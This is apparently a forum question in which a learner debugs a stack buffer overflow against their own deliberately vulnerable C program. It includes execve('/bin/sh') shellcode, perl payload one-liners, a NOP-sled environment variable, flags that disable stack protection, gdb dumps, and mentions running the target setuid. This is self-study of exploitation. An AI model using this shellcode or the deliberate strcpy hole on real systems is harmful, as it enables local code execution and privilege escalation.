I made a c vulnerable C code and tried to exploit it but it doesn't seem to work even though I copied other examples. I apologize if I included lot of code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void hello(char *name){
char name_buffer[24];
strcpy(name_buffer, name);
printf("Hello %s\n", name_buffer);
}
int main(int argc, char **argv){
hello(argv[1]);
return 0;
}
This is what it shows when I execute it
perl -e 'print "\x5a\xe9\xff\xff\xff\x7f\x00\x00" x 40' | ./a.out
Segmentation fault (core dumped)
The address in the input is the address of an environment variable SHELLCODE
cat shellcode
1�1۰̀Sh/ttyh/dev��1�f�'�̀1�Ph//shh/bin��PS�ᙰ
//shellcode is "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" printed and piped using perl
export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode)
when I run the program in gdb:
run $(perl -e 'print "\x5a\xe9\xff\xff\xff\x7f\x01\x02" x 30')
// I added "\x01\x02" because if I just put \x00\x00 instead it won't get read due to bash ignoring null bytes. I did this so I can see that the SHELLCODE address is put is correctly put in place of the actual RIP
// break at line of strcpy(name_buffer, name);
i f
Stack level 0, frame at 0x7fffffffdcc0:
rip = 0x555555554696 in hello (test.c:8); saved rip = 0x5555555546e6
called by frame at 0x7fffffffdce0
source language c.
Arglist at 0x7fffffffdcb0, args:
name=0x7fffffffe117 "Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177", <incomplete sequence \351>...
Locals at 0x7fffffffdcb0, Previous frame's sp is 0x7fffffffdcc0
Saved registers:
rbp at 0x7fffffffdcb0, rip at 0x7fffffffdcb8
(gdb) x/24xg name_buffer
0x7fffffffdc90: 0x0000000000000001 0x000055555555473d
0x7fffffffdca0: 0x00007ffff7de59a0 0x0000000000000000
0x7fffffffdcb0: 0x00007fffffffdcd0 0x00005555555546e6
0x7fffffffdcc0: 0x00007fffffffddb8 0x0000000200000000
0x7fffffffdcd0: 0x00005555555546f0 0x00007ffff7a05b97
0x7fffffffdce0: 0x0000000000000002 0x00007fffffffddb8
0x7fffffffdcf0: 0x0000000200008000 0x00005555555546c4
0x7fffffffdd00: 0x0000000000000000 0xb9bb56fbb5ab9e21
0x7fffffffdd10: 0x0000555555554580 0x00007fffffffddb0
0x7fffffffdd20: 0x0000000000000000 0x0000000000000000
0x7fffffffdd30: 0xecee03ae818b9e21 0xecee13118ed59e21
0x7fffffffdd40: 0x00007fff00000000 0x0000000000000000
As you see the return address is at 0x7fffffffdcb8 which is 0x00005555555546e6
Continuing, we can see that it is successfully overwritten in 0x7fffffffdcb8 to 0x02017fffffffe95a:
x/24xg name_buffer
0x7fffffffdc90: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdca0: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdcb0: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdcc0: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdcd0: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdce0: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdcf0: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdd00: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdd10: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdd20: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdd30: 0x02017fffffffe95a 0x02017fffffffe95a
0x7fffffffdd40: 0x02017fffffffe95a 0x02017fffffffe95a
I tried with an input repeating the address only once, twice and random values, but the error remains the same. I compiled the C code using:
gcc test.c -fno-stack-protector
//and also with
gcc test.c -fno-stack-protector -fno-mudflap
I doubt that the problem comes from the shellcode since I only copied it.
Edit : I get an error Program recieved signal SIGILL, Illegal instruction 0x0007fffffffffeaac in ?? (). I think this is because I removed suid from the program a.out, but when it has suid, I cant find the environment variable like I do when it doesn't has suid, it shows that all addresses are empty:
x/32s $rsp + 0x500 // where I normally find SHELLCODE variable
0x00007ffffdea4521: "" // and the addresses are also very different than without suid
...
